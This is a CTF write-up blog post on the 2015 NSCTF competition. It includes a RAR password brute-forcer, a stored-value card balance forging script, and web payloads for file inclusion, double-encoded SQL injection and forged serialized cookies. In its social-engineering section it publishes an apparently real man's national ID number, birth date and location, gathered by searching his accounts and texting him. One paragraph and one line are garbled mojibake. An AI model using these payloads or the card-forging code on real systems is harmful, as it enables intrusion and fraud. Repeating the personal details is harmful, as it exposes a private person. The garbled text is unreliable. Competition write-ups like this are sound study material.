LoRexxar's Blog

Nsctf2015_Writeup

2015/09/28

Starting September 26 I played three CTFs back to back: NSCTF, GCTF and 趋动CTF. My skills still have plenty of room to improve, but luckily I unexpectedly made the top 50 in NSCTF and solved a fair number of web challenges, so here is the NSCTF writeup for the record.

Here is the final ranking and completion status, as a keepsake.

MISC

0x01 Twitter Point: 100 (Done)

A sign-in challenge, nothing much to say.
Follow the NSCTF Twitter account and you get a hash:
fc42aa2046ed6e90cab82b1094b19adb
It is an MD5; a lookup (MD5 cannot be reversed, only matched against a table of known inputs) gives nsfocus666.
Put it in the flag format, Get!

0x02 WireShark Point: 250

The challenge is packet analysis, which I honestly couldn't do. I flipped through the capture in Wireshark and found a key.rar, and got stuck there. Here is ddog's code (I don't know which step I was missing; it did nothing for me anyway…)

import rarfile  # pip install rarfile; needs the unrar binary on PATH


# candidate passwords: "nsfocus" followed by a five-digit number, 00000..99999
# (the original range(10000, 100000) skipped every number below 10000)
def candidates():
    for i in range(100000):
        yield 'nsfocus%05d' % i


def pojie_rar(path='./key.rar'):
    rar = rarfile.RarFile(path, mode='r')
    try:
        for password in candidates():
            try:
                rar.extractall(path='./', pwd=password)
            except rarfile.Error:
                continue  # wrong password (RarWrongPassword) or CRC failure, try the next one
            print(' ----success!, The password is %s' % password)
            return password
    finally:
        rar.close()
    return None


if __name__ == '__main__':
    pojie_rar()

0x03 Xiaolü's Goddess (小绿的女神) Point: 300 (Done)

I skipped this one at first, and there is no screenshot of the original challenge. Roughly: the goddess's birthday is February 8, you want to top her card up to 208 yuan, and once a balance query returns 208 you get the flag. Honestly I can only just read hex, but z神 later explained the principle to me, so I'm writing it down here; it counts as one more thing learned.

The key to this challenge is that three fields on the card matter:
1. the amount consumed
2. the card's limit (its total)
3. the card's balance
2 = 1 + 3
The card's layout is roughly as follows.

From the description the structure is easy to spot: each field is stored as S ~S S ~S, the value followed by its bitwise complement, twice.
Working it out: the first part is the amount consumed, the second is the card's total, i.e. the limit, and the third is the balance.
One crucial point: the hex numbers sit in memory little-endian, so the bytes have to be read back to front.
For example, this one is actually 0xFFFFD5D0 (the complement of 0x00002A2F).

So the final patched card looks like this:

Submit, Get Flag!
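The S ~S S ~S layout and the limit = consumed + balance rule, worked through in Python as an added example (this is not the post's own code, and no dump from the challenge card is reproduced). Assumptions: each field is 32 bits; the card image is the three blocks consumed || limit || balance in that order; the unit of the amounts is whatever the card stores; and when forging a balance the consumed block is kept while the limit block is rewritten so the relation still holds.

```python
import struct

ALL_ONES = 0xFFFFFFFF


def pack_value(value):
    """Encode one 32-bit amount in the S ~S S ~S layout: little-endian value,
    its bitwise complement, the value again, the complement again (16 bytes)."""
    if not 0 <= value <= ALL_ONES:
        raise ValueError('value must fit in 32 bits')
    inverse = value ^ ALL_ONES
    return struct.pack('<IIII', value, inverse, value, inverse)


def unpack_value(block):
    """Parse an S ~S S ~S block, checking that both copies and both complements agree."""
    if len(block) != 16:
        raise ValueError('expected 16 bytes, got %d' % len(block))
    v1, n1, v2, n2 = struct.unpack('<IIII', block)
    if v1 != v2 or n1 != n2 or (v1 ^ n1) != ALL_ONES:
        raise ValueError('inconsistent value block')
    return v1


def complement_hex(value):
    """What the dump shows next to a value: 0x2A2F is stored beside 0xFFFFD5D0."""
    return '0x%08X' % (value ^ ALL_ONES)


def read_card(card):
    """Card image = consumed || limit || balance, three 16-byte blocks (assumed order).
    Enforces the write-up's rule: limit = consumed + balance."""
    if len(card) != 48:
        raise ValueError('expected 48 bytes, got %d' % len(card))
    consumed, limit, balance = (unpack_value(card[i:i + 16]) for i in (0, 16, 32))
    if limit != consumed + balance:
        raise ValueError('limit (%d) != consumed (%d) + balance (%d)' % (limit, consumed, balance))
    return consumed, limit, balance


def forge_balance(card, wanted_balance):
    """Return a copy of the card whose balance reads wanted_balance.
    Assumption: the consumed block is kept and the limit block is rewritten,
    so a limit = consumed + balance check on the card still passes."""
    consumed, _limit, _balance = read_card(card)
    return (pack_value(consumed)
            + pack_value(consumed + wanted_balance)
            + pack_value(wanted_balance))


if __name__ == '__main__':
    # constructed sample card: 50 spent, limit 150, balance 100 (units as stored on the card)
    card = pack_value(50) + pack_value(150) + pack_value(100)
    print(read_card(card))
    print(read_card(forge_balance(card, 208)))
    print(complement_hex(0x2A2F))
```

unpack_value rejects a block whose two copies or complements disagree, which is the check a card reader would use to spot a sloppy edit; forge_balance keeps all three blocks mutually consistent so that check, and the 2 = 1 + 3 rule, both pass.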

crypto

0x01 The magic string (神奇的字符串) Point 100 (Done)

A simple challenge; I was just stumped at first. Searching for the header on Baidu showed it was AES; decrypting gave the flag, and then I shifted the result into the NSCTF flag format. Get Flag!

0x02 The magic picture (神奇的图片) Point 100

An image challenge. I flipped through it in Stegsolve without finding anything and figured it might be two images joined together, but I couldn't find the second image header, so in the end I had to give this one up.

0x03 The mysterious picture+10086 (神秘的图片+10086) Point 200 (Done)

Image steganography. Flipping through the planes in Stegsolve turned up an image that looked very much like a QR code; comparing it with a normal one showed black and white were swapped, so I inverted it in Photoshop and scanned it. Get Flag.

web

0x01 Be careful Point 100 (Done)

杩欓鐩畝鐩村潙锛屾墦寮椤甸潰浠涔堜笢瑗块兘娌℃湁锛岀炕浠涔堥兘寰椾笉鍒版湁鐢ㄧ殑淇℃伅锛屾渶鍚庤剳娲炲姞Index.php鍜宨ndex.html锛屽彂鐜癐ndex.php浼氬彂鐢熻烦杞紝鍒癷ndex.html锛屼簬鏄嫤鎴煡鐪嬫簮鐮侊紝Get flag!

0x02 Where are you come from Point 100 (Done)

A truly melodramatic challenge. Opening it pops up "Are you from Mars?". My first reaction was to change the Referer, which did nothing however I set it. Then came the hint: only the local machine can access it, so I added an X-Forwarded-For header. I kept assuming 127.0.0.1; what finally worked, on a whim, was the IP of the nsctf site itself. Get flag!
ps: the organizers are genuinely unwell...

0x03 Version Point 100 (Done)

Open the challenge and it asks you to submit a PHP version. My first reaction was to brute-force PHP versions with Burp, with no luck at all. Official hint: it's just an ordinary PHP version, don't overthink it. Then I got the hint by accident…
http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/03/?ver=5.5.9-1ubuntu4.12

Get Flag… nothing more to say. That is the full distribution package version, the kind of string an X-Powered-By header leaks; you'd need an unhinged imagination to think of it.

0x04 Brute force Point:200 (Done)

The name says it all: run passwords with Burp. The page title was password.txt; opening it showed a password list, Burp found the password, and logging in gave this URL:
http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/04/290bca70c7dae93db6644fa00b9d83b9.php?act=add

Once in, it says leaving a message as the administrator gets you the flag. There is a hidden parameter for the username; leaving a message as admin didn't work, neither did assorted injection and XSS payloads, until on a whim I tried root…
GetFlag!

0x05 Decode Point:200 (Done)

Nothing special here: look up each function on Baidu to see what it does, write the script, Get flag.

<?php
// the challenge's transformation run backwards: base64-decode, shift every byte down by one, reverse the string
$x = base64_decode('fjg4OjM2ZTFiZzg0MzhlNDE3NTdkOjI5Y2dlYjZlNDhjYEdVRFRPfDtoYm1n');
$key = '';
for ($i = 0; $i < strlen($x); $i++) {
    $c = substr($x, $i, 1);
    $y = ord($c) - 1;
    $c = chr($y);
    $key = $key . $c;
}
$key = strrev($key);
echo $key;
?>
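The same transformation in Python, plus its inverse, as an added example (not the post's code): decode_key reproduces the PHP step by step, and encode_key builds a blob from a chosen string, which is the quickest way to confirm the decoder is exact and to produce test data for similar challenges.

```python
import base64

# the challenge's blob, copied from the PHP above
BLOB = 'fjg4OjM2ZTFiZzg0MzhlNDE3NTdkOjI5Y2dlYjZlNDhjYEdVRFRPfDtoYm1n'


def decode_key(blob):
    """What the PHP does: base64-decode, shift every byte down by one (mod 256, like chr()), reverse."""
    raw = base64.b64decode(blob)
    shifted = bytes((b - 1) & 0xFF for b in raw)
    return shifted[::-1].decode('latin-1')


def encode_key(plaintext):
    """The inverse (not on the page): reverse, shift every byte up by one, base64-encode."""
    reversed_bytes = plaintext.encode('latin-1')[::-1]
    shifted = bytes((b + 1) & 0xFF for b in reversed_bytes)
    return base64.b64encode(shifted).decode('ascii')


if __name__ == '__main__':
    key = decode_key(BLOB)
    print(key)
    assert encode_key(key) == BLOB
```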

0x06 javascript Point:200 (Done)

Seeing "javascript" you can probably guess what kind of challenge it is: JS deobfuscation. The tool for this is the Firefox console (Chrome works too).
Drop the whole mess into the console and pretty-print it, and you get a readable function declaration:

// Dean Edwards' p,a,c,k,e,d packer: the page wraps this in eval(...) and calls it with the packed arguments
function unpack(p, a, c, k, e, d) {
    e = function (c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) d[e(c)] = k[c] || e(c);
        k = [
            function (e) {
                return d[e]
            }
        ];
        e = function () {
            return '\\w+'
        };
        c = 1;
    };
    while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p;
}

What follows it are just the corresponding arguments p, a, c, k, e, d. Don't be put off by the clutter; only a few pieces are useful, and the one that matters is p, the string between the single quotes.
Put that in the console (run the unpacker on it instead of letting eval execute the result), pretty-print, and you get the following.
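The p,a,c,k,e,d scheme in Python, as an added example (not the post's code and not the packer's own implementation): encode_index is the e() above, unpack reverses it, a minimal pack shows the forward direction so the round trip can be checked, and unpack_js pulls the arguments out of an eval(function(p,a,c,k,e,d){...}(...)) call. The sample source and the regular expression for the argument list are constructed here; the regex assumes the payload string escapes its single quotes with a backslash, which is how such payloads are usually emitted.

```python
import re

BASE36 = '0123456789abcdefghijklmnopqrstuvwxyz'
WORD = re.compile(r'\b\w+\b', re.ASCII)          # the packer's own \b\w+\b token rule


def encode_index(c, a):
    """The packer's e(): index c written in base a with digits 0-9a-z and, above 35, A-Z."""
    head = '' if c < a else encode_index(c // a, a)
    r = c % a
    return head + (chr(r + 29) if r > 35 else BASE36[r])


def unpack(p, a, c, k):
    """Undo the packing: every word token of p that is an encoded index is replaced
    by its dictionary entry k[index]; an empty entry means the token is its own word."""
    table = {}
    for i in range(c):
        key = encode_index(i, a)
        table[key] = k[i] if i < len(k) and k[i] else key
    return WORD.sub(lambda m: table.get(m.group(0), m.group(0)), p)


def pack(source, a=62):
    """A minimal packer, the forward direction: number each distinct word token and
    replace it with its encoded index. Returns the (p, a, c, k) arguments."""
    words, index = [], {}

    def replace(m):
        w = m.group(0)
        if w not in index:
            index[w] = len(words)
            words.append(w)
        return encode_index(index[w], a)

    p = WORD.sub(replace, source)
    # like the real packer, leave the entry empty when a word already equals its encoding
    k = ['' if encode_index(i, a) == w else w for i, w in enumerate(words)]
    return p, a, len(k), k


# constructed: matches the argument list of an eval(function(p,a,c,k,e,d){...}('...',a,c,'...'.split('|'),0,{})) call
PACKED_CALL = re.compile(
    r"\}\('(?P<p>(?:[^'\\]|\\.)*)',\s*(?P<a>\d+),\s*(?P<c>\d+),\s*"
    r"'(?P<k>[^']*)'\.split\('\|'\),\s*\d+,\s*\{\}\)\)", re.DOTALL)


def render_packed(p, a, c, k):
    """Wrap the arguments in the call shape the page shows (the unpacker body is elided;
    only the argument list matters for parsing)."""
    body = p.replace('\\', '\\\\').replace("'", "\\'")
    return "eval(function(p,a,c,k,e,d){/* unpacker */}('%s',%d,%d,'%s'.split('|'),0,{}))" % (
        body, a, c, '|'.join(k))


def unpack_js(js):
    """Pull p, a, c, k out of a packed snippet and return the original source."""
    m = PACKED_CALL.search(js)
    if not m:
        raise ValueError('not a p,a,c,k,e,d payload')
    p = re.sub(r'\\(.)', r'\1', m.group('p'))        # undo the \' escaping inside the string
    return unpack(p, int(m.group('a')), int(m.group('c')), m.group('k').split('|'))


# constructed sample, in the style of the challenge's login check
SAMPLE_SOURCE = ("var strKey2 = 'CaNUknOWThIsK3y'; "
                 "if (upass == strKey2.substring(2, 6)) { alert('Login Success!'); }")

if __name__ == '__main__':
    p, a, c, k = pack(SAMPLE_SOURCE)
    print(render_packed(p, a, c, k))
    print(unpack_js(render_packed(p, a, c, k)))
```

Because the dictionary k is shipped alongside p, this is obfuscation and not encryption: unpack_js recovers the source without running any of it, which is the safer route than replacing eval in a browser console.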

_f = function () {
var f = document.createElement('form');
document.getElementById('login').appendChild(f);
f.name = 'login';
return f
}();
_uname = function () {
var uname = document.createElement('input');
uname.type = 'text';
uname.id = 'uname';
uname.value = 'Input Username';
uname.style.margin = '0px 0px 0px 60px';
_f.appendChild(uname);
uname.onfocus = function () {
if (this.value == 'Input Username') this.value = ''
};
uname.onblur = function () {
if (this.value == '') this.value = 'Input Username'
};
return uname
}();
_br = function () {
var br = document.createElement('br');
_f.appendChild(br);
br = document.createElement('br');
_f.appendChild(br);
return br
}();
_upass = function () {
var upass = document.createElement('input');
upass.type = 'password';
upass.id = 'upass';
upass.value = 'Input Password';
upass.style.margin = '0px 0px 0px 60px';
_f.appendChild(upass);
upass.onfocus = function () {
if (this.value == 'Input Password') this.value = ''
};
upass.onblur = function () {
if (this.value == '') this.value = 'Input Password'
};
return upass
}();
_btn = function () {
var btn = document.createElement('input');
_f.appendChild(btn);
btn.type = 'button';
btn.value = 'login';
btn.onclick = function () {
uname = document.getElementById('uname').value;
upass = document.getElementById('upass').value;
if (uname == '') alert('Please Input Username!');
else if (upass == '') alert('Please Input Password!');
else {
eval(unescape('var%20strKey1%20%3D%20%22JaVa3C41ptIsAGo0DStAff%22%3B%0Avar%20strKey2%20%3D%20%22CaNUknOWThIsK3y%22%3B%0Avar%20strKey3%20%3D%20String.fromCharCode%2871%2C%2048%2C%20111%2C%20100%2C%2033%29%3B%0Aif%20%28uname%20%3D%3D%20%28strKey3%20+%20%28%28%28strKey1.toLowerCase%28%29%29.substring%280%2C%20strKey1.indexOf%28%220%22%29%29%20+%20strKey2.substring%282%2C%206%29%29.toUpperCase%28%29%29.substring%280%2C%2015%29%29%29%20%7B%0A%20%20%20%20var%20strKey4%20%3D%20%27Java_Scr1pt_Pa4sW0rd_K3y_H3re%27%3B%0A%20%20%20%20if%20%28upass%20%3D%3D%20%28strKey4.substring%28strKey4.indexOf%28%271%27%2C%205%29%2C%20strKey4.length%20-%20strKey4.indexOf%28%27_%27%29%20+%205%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28%27Login%20Success%21%27%29%3B%0A%20%20%20%20%20%20%20%20document.getElementById%28%27key%27%29.innerHTML%20%3D%20unescape%28%22%253Cfont%2520color%253D%2522%2523000%2522%253Ea2V5X0NoM2NrXy50eHQ%3D%253C/font%253E%22%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20alert%28%27Password%20Error%21%27%29%3B%0A%20%20%20%20%7D%0A%7D%20else%20%7B%0A%20%20%20%20alert%28%27Login%20Failed%21%27%29%3B%0A%7D'))
}
};
return false
}();

It's easy to see the problem now: copy the whole eval(...) into the console and change eval to alert, or just document.write, to get the key source:

var strKey1 = "JaVa3C41ptIsAGo0DStAff";
var strKey2 = "CaNUknOWThIsK3y";
var strKey3 = String.fromCharCode(71, 48, 111, 100, 33);
if (uname == (strKey3 + (((strKey1.toLowerCase()).substring(0, strKey1.indexOf("0")) + strKey2.substring(2, 6)).toUpperCase()).substring(0, 15))) {
var strKey4 = 'Java_Scr1pt_Pa4sW0rd_K3y_H3re';
if (upass == (strKey4.substring(strKey4.indexOf('1', 5), strKey4.length - strKey4.indexOf('_') + 5))) {
alert('Login Success!');
document.getElementById('key').innerHTML = unescape("%3Cfont%20color%3D%22%23000%22%3Ea2V5X0NoM2NrXy50eHQ=%3C/font%3E");
} else {
alert('Password Error!');
}
} else {
alert('Login Failed!');
}

At this point, if you take the value out of unescape and go straight to it, it tells you the username is wrong. I first thought it was a cookie issue, so I went back and worked the check out by hand (it runs entirely client-side, so the credentials follow from the source without ever submitting the form):
uname=G0od!JAVA3C41PTISAGO
upass=1pt_Pa4sW0rd_K3y_H3re
Logging in still did nothing; on a whim I POSTed the data instead, Get Flag!

0x07 social engineer Point:150(Done)

A nonsense challenge. It gives Xiaoming's name, birthday and QQ number and wants the password. All attempts failed until the organizers posted a hint.
hint: a very simple Chinese-style password, name plus birthday, mind the case.
So I wrote a wordlist and ran it, getting the password Xiaoming09231995. Then came the second stage (the worst part):
the challenge wants you to social-engineer Mr. Wang's details over the phone. It only says "social engineering" and never says how much is enough for the flag, so I ended up with a pile of information:
1. WeChat friend search: 伟
2. Alipay transfer account search: 王伟, Jiaxing, Zhejiang
3. Mobile QQ search: 王?薇's dad (one character unrecoverable), 31, Hangzhou, Zhejiang
4. ID number: 34112519831224875X
5. Date of birth: 19831224
6. The ID number prefix resolves to Dingyuan County, Chuzhou, Anhui

In the end, out of sheer desperation, I even sent a text message, and it turned out to be a real person (what on earth do the organizers have against 王伟?). Finally, on a hunch that the check itself was the problem, I entered the ID number. Get Flag!

ps: stop messing with me, I'm going to call the police

0x08 LFI Point:200(Done)

Not much to say: in the file form, submit the value below. The convert.base64-encode filter makes include() emit index.php's source as base64 instead of executing it; decode that and you get the code shown after it.
php://filter/read=convert.base64-encode/resource=index.php

<?php
error_reporting(0);
if(isset($_POST['submit'])){
    if(isset($_POST['file'])){
        $file = $_POST['file'];
        // split on "=": only the first and third pieces are checked, so any filter chain
        // of the form php://filter/read=<filters>/resource=index.php gets through
        $method = explode("=", $file);
        if( ($method[0] == "php://filter/read") && ($method[2] == "index.php") ){
            include($file);
            exit();
        }else{
            exit('error file or error method');
        }
    }
}

0x09 change password Point:300 (Done)

After poking around it felt like there had to be source, and I found it in .index.php.swp (a leftover Vim swap file). I forgot to save the source. Auditing it and building the payload has one trap, and I'm not sure the organizers' heads are screwed on right: id has to be 1, whereas the reflex is to go with what the cookie shows, the original password 150923 and id=3. (Mind that the s:8 length prefix must equal the password's byte length, or unserialize() rejects the whole string.)

payload:userInfo=a:2:{s:2:"id";i:1;s:4:"pass";s:8:"20150923";}&oldPass=20150923&newPass=321321

Get Flag!
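The cookie is a PHP serialize() string, so forging it means writing one by hand and getting every length right. The helper below is an added example (not the post's code): a minimal serialize/unserialize for the scalar and array subset found in session cookies, and forge_user_info building the userInfo value from the payload above. The key order id then pass is taken from the payload; how the server validates it is outside this example.

```python
def php_serialize(value):
    """Serialize None, bool, int, str, list and dict the way PHP's serialize() does.
    Lists become arrays keyed 0..n-1; dicts keep their insertion order."""
    if value is None:
        return 'N;'
    if isinstance(value, bool):
        return 'b:%d;' % value
    if isinstance(value, int):
        return 'i:%d;' % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode('utf-8')), value)   # PHP counts bytes, not characters
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = ''.join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return 'a:%d:{%s}' % (len(value), body)
    raise TypeError('cannot serialize %r' % type(value))


def php_unserialize(data):
    """Parse the same subset back. Works on bytes so the s:<len> byte counts line up."""
    if isinstance(data, str):
        data = data.encode('utf-8')
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError('trailing data at offset %d' % pos)
    return value


def _parse(data, pos):
    tag = data[pos:pos + 1]
    if tag == b'N':
        return None, pos + 2
    if tag in (b'i', b'b'):
        end = data.index(b';', pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == b'b' else num), end + 1
    if tag == b's':
        colon = data.index(b':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                                  # skip the opening :"
        if data[start + length:start + length + 2] != b'";':
            raise ValueError('string length mismatch at offset %d' % pos)
        return data[start:start + length].decode('utf-8'), start + length + 2
    if tag == b'a':
        colon = data.index(b':', pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                                    # skip the opening :{
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            result[key], pos = _parse(data, pos)
        if data[pos:pos + 1] != b'}':
            raise ValueError('missing } at offset %d' % pos)
        return result, pos + 1
    raise ValueError('unsupported tag %r at offset %d' % (tag, pos))


def forge_user_info(user_id, password):
    """Build the userInfo cookie value from the payload above: keys id and pass, in that order."""
    return php_serialize({'id': user_id, 'pass': password})


if __name__ == '__main__':
    cookie = forge_user_info(1, '20150923')
    print(cookie)
    print(php_unserialize(cookie))
```

When sending the value in a real Cookie header, URL-encode it: the quotes, braces and semicolons in the serialized string are otherwise cookie delimiters.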

0x0A Variable cover Point:250 (Done)

No idea at all at first, and injection wouldn't get through. The official hint: a backup file that doesn't follow the usual naming.
After much guessing I stumbled on Index.php., got the source and started building the payload.

payload:username='qwe&password=||1#&Submit=%E6%8F%90%E4%BA%A4&_CONFIG=123321

Here username=' => username=\' => username[0]=\ (the _CONFIG parameter is presumably what does the variable overwriting the challenge is named for).

鎵浠et Flag!

0x0B File Upload Point:400 (Done)

0x0C SQLI Point:350 (Done)

Browsing the source a bit, I found a hidden parameter filtername; testing it showed:
filtername is a filter; setting it lets you bypass part of the filtering on username, because
username=teadminst&filtername=admin is filtered first and then queried, so the query sees test.

What's left is the filter on single quotes. The trick here is %2527: the %25 is decoded into %, leaving %27, which a second decode turns into the single quote. So build the payload:

username=admin%2527+uniewqoN+Aewqll+sEleewqct+(group_concat(flag)),2+from+flag#&filtername=ewq

Get Flag!
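How the two bypasses combine, modelled in Python as an added example (not the challenge's source, which was never published): a keyword blacklist, the filtername strip and a second URL decode in the order the write-up implies, beside a hardened version that decodes once and binds the value. The blacklist contents, the exact processing order and the users table are assumptions.

```python
import sqlite3
from urllib.parse import unquote, unquote_plus

# the page's payload, exactly as sent in the query string
PAYLOAD = 'admin%2527+uniewqoN+Aewqll+sEleewqct+(group_concat(flag)),2+from+flag#'
FILTERNAME = 'ewq'

# assumed blacklist: the challenge source was not published
BLACKLIST = ('union', 'select', "'")


def vulnerable_query(username_param, filtername_param):
    """Model of the challenge's processing order (an assumption): the server decodes the
    query string once, the blacklist runs, filtername is stripped, the value is decoded a
    second time and then concatenated into the SQL. Returns None when the blacklist fires."""
    username = unquote_plus(username_param)            # 1. server-side decode: %2527 -> %27, + -> space
    filtername = unquote_plus(filtername_param)
    if any(bad in username.lower() for bad in BLACKLIST):
        return None                                     # 2. keywords split by "ewq" and %27 slip past
    username = username.replace(filtername, '')         # 3. strip filtername: unioN / All / sElect reappear
    username = unquote(username)                        # 4. second decode: %27 -> '
    return "SELECT id, name FROM users WHERE username = '%s' LIMIT 1" % username   # 5. concatenation


def hardened_query(username_param):
    """Decode exactly once, never rewrite the value, and bind it as a parameter."""
    username = unquote_plus(username_param)
    return "SELECT id, name FROM users WHERE username = ? LIMIT 1", (username,)


def run_hardened(username_param):
    """Execute the bound query against a constructed in-memory users table."""
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'Administrator', 'admin')")
    sql, params = hardened_query(username_param)
    try:
        return conn.execute(sql, params).fetchall()
    finally:
        conn.close()


if __name__ == '__main__':
    print(vulnerable_query('teadminst', 'admin'))
    print(vulnerable_query(PAYLOAD, FILTERNAME))
    print(run_hardened('admin'), run_hardened(PAYLOAD))
```

The lesson is ordering: any validation that runs before the last transformation of the input (here a strip and a second decode) validates something other than what reaches the query. Binding the value removes the problem regardless of what the filters do.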

All in all I got a lot out of this NSCTF: plenty of tricks I didn't know before, and after a holiday's worth of studying I have a new understanding of many things I didn't get. Thanks also to z神 and 呵呵 for the lift; I made the top 50, very happy (0。0)
